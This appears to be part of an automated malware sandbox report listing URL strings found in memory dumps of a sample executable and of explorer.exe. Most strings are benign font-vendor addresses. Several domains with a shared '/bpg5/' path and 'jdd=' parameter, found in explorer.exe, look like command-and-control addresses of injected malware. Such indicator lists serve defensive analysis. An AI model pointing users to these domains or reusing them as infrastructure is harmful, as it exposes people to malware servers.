          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/www.bisarropainting.comjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comAD
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397211203.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398767170.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397102610.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 535276_86376.exe, 00000000.00000003.397689898.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 535276_86376.exe, 00000000.00000003.397102610.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398511507.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers9bvkr
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 535276_86376.exe, 00000000.00000003.397211203.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
          Source: 535276_86376.exe, 00000000.00000003.399888854.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
          Source: 535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397432113.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397211203.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397485311.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397371212.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: 535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF:yqk
          Source: 535276_86376.exe, 00000000.00000003.399019144.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFIyk
          Source: 535276_86376.exe, 00000000.00000003.397211203.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsd
          Source: 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399098076.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398833639.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399214646.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398767170.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399019144.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400396259.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd:yqk
          Source: 535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdsed:yqk
          Source: 535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comepko
          Source: 535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
          Source: 535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiona
          Source: 535276_86376.exe, 00000000.00000003.400549068.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400591702.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400807219.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400849610.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400656823.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400703336.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400396259.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
          Source: 535276_86376.exe, 00000000.00000003.397102610.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsief
          Source: 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsiva
          Source: 535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtly/kt
          Source: 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398833639.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398767170.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtued
          Source: 535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399098076.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399214646.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399019144.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueom
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392270268.0000000005512000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.391650600.0000000005546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 535276_86376.exe, 00000000.00000003.391784177.0000000005546000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.391931012.0000000005546000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.391917455.0000000005546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnT
          Source: 535276_86376.exe, 00000000.00000003.391650600.0000000005546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn~
          Source: 535276_86376.exe, 00000000.00000003.403003550.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402100753.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402920758.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402286222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401797396.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401712496.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401849366.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401946462.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401996781.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402387221.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.403191353.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402230354.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402518001.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402803455.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402580743.0000000005527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 535276_86376.exe, 00000000.00000003.401946462.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402920758.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402387221.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402100753.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402736491.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402803455.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402286222.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402518001.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401712496.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401849366.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402580743.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.402230354.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401996781.000000000552A000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.401797396.000000000552A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmUc
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/www.gomarketing.infojdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.658237666.000000000613F000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.658237666.000000000613F000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/
          Source: explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/www.haynicorpon.biz
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizjdd=UX4BZm
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/
          Source: explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/www.jhg61.comjdd=UX4BZm
          Source: 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Iyk
